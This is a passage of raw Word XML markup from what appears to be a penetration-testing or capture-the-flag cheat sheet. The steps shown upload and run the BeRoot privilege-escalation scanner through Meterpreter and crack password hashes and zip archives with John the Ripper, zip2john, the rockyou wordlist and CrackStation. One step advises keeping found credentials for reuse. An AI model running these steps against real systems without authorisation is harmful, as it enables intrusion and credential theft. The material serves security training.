            <w:r w:rsidR="00B55024" w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidR="00B55024">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00666BF5" w14:textId="0E2755BF" w:rsidR="00B55024" w:rsidRPr="00025437" w:rsidRDefault="00B55024" w:rsidP="00B55024">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Now, ensure the .py script has permissions to be run:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">+x </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55024">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>beroot.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00025437" w14:paraId="03C74BBD" w14:textId="77777777" w:rsidTr="00025437">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="398DB4BE" w14:textId="2AA6002D" w:rsidR="00025437" w:rsidRDefault="00025437" w:rsidP="00B55024">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C5BB285" w14:textId="183482AC" w:rsidR="00025437" w:rsidRDefault="005E64CA" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>BeRoot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4166E198" w14:textId="77777777" w:rsidR="00025437" w:rsidRDefault="005E64CA" w:rsidP="00B55024">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>If in Meterpreter, use the upload functionality to upload the file in the current working directory and from there utilise the shell command to then execute the file:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005E64CA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E64CA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">beroot.py </w:t>
            </w:r>
            <w:r w:rsidRPr="005E64CA">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>beroot.exe</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005E64CA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>shell</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005E64CA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>beroot.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DC5575" w14:textId="15667DC4" w:rsidR="005E64CA" w:rsidRDefault="005E64CA" w:rsidP="00B55024">
            <w:r w:rsidRPr="005E64CA">
              <w:t>This will allow you to see any possible privilege escalation techniques that are possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00446586" w14:paraId="5ECE2C91" w14:textId="77777777" w:rsidTr="00B55024">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2E1AF2E5" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00546705" w:rsidP="00B55024"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5AE505AB" w14:textId="77777777" w:rsidR="00546705" w:rsidRDefault="00546705" w:rsidP="00B55024">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F176018" w14:textId="77777777" w:rsidR="00546705" w:rsidRPr="001E0F42" w:rsidRDefault="00546705" w:rsidP="00B55024"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54B13855" w14:textId="77777777" w:rsidR="00562F49" w:rsidRDefault="00562F49"/>
    <w:p w14:paraId="4D5022BA" w14:textId="77777777" w:rsidR="00882AEF" w:rsidRDefault="00882AEF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="165122FF" w14:textId="0D8608B2" w:rsidR="00882AEF" w:rsidRPr="00882AEF" w:rsidRDefault="00882AEF" w:rsidP="00882AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00882AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ohn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF1724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> crackstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAFCA13" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="787"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F00DA" w14:paraId="0006D5EF" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EE82B26" w14:textId="6443592B" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7BCC0806" w14:textId="2C90DDB3" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>john</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004F00DA">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(john is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BA5BFF0" w14:textId="2F9A83F5" w:rsidR="004F00DA" w:rsidRPr="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F00DA">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF ANY HASHES ARE FOUND USE JOHN. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6A2B44" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>If need be, use John The Ripper (john) to crack any hashed passwords/information found such as RSA keys.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30C13B25" w14:textId="5AFC9241" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>If john can’t read the format of the key, or if the RSA key requires a password, you can use other tools such as zip2john or ssh2john to create a file which is readable by john.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="662E400F" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2149DCFC" w14:textId="29036795" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29AF7B01"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4C0E931B" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRPr="001E50A7" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t xml:space="preserve">Use the command </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">john </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="4B2A563B" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="175C63B5" w14:textId="3B17050A" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4E69CB94"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4BB3C8C7" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t xml:space="preserve">Remember, the hash must be within a file as text. Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:t>command</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">echo </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORDHASH</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Password Hash.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="04943ACB" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="323AEA67" w14:textId="2ED3B232" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="193F4A83"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2C1A35F1" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>Remember, save all credentials into a word processing file, future machines may use the same username and passwords you’ve already found.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="72A18025" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="45A021DD" w14:textId="4F89DB6B" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B3FE3E4"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4D167C0B" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t xml:space="preserve">If any archive files are password protected, use </w:t>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">zip2john </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">to create a file that </w:t>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">john </w:t>
            </w:r>
            <w:r>
              <w:t>can read, it won’t read it while it is in the .zip format.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">zip2john </w:t>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE NAME.zip</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="001E50A7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>&gt; hash</w:t>
            </w:r>
            <w:r w:rsidRPr="002468CE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Places results in a file called ‘hash’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="5A0226C9" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="38BDF697" w14:textId="5F34CCBC" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AA9CF1A"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0F7B06E5" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>Now, let’s use john and a dictionary list of words to crack the file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC428A0" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>john</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>ordlist=</w:t>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/john/rockyou.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B049E1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--format=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B049E1">
              <w:t>Use to select specific hash type</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69576D1F" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRPr="001E0F42" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B34CEA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--fork=4</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">Select an </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>amount</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> of forks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>When using a wordlist, try the rockyou.txt and make sure it is unzipped using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">locate </w:t>
            </w:r>
            <w:r w:rsidRPr="001E0F42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F00DA" w14:paraId="07215640" w14:textId="77777777" w:rsidTr="000C579C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F96D5C6" w14:textId="7EF8E9DE" w:rsidR="004F00DA" w:rsidRDefault="00F0782F" w:rsidP="00C40FD7">
            <w:r>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="004F00DA">
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7893BDDB" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>crackstation</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007B5DB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>(website)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E76BD9" w14:textId="77777777" w:rsidR="004F00DA" w:rsidRDefault="004F00DA" w:rsidP="00C40FD7">
            <w:r>
              <w:t>WITHIN FILES THAT ARE EXTRACTED FROM A ZIPPED FILE, IF ANY HASH, SUCH AS MD5 HASHES ARE FOUND,TRY USING CRACKSTATION.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
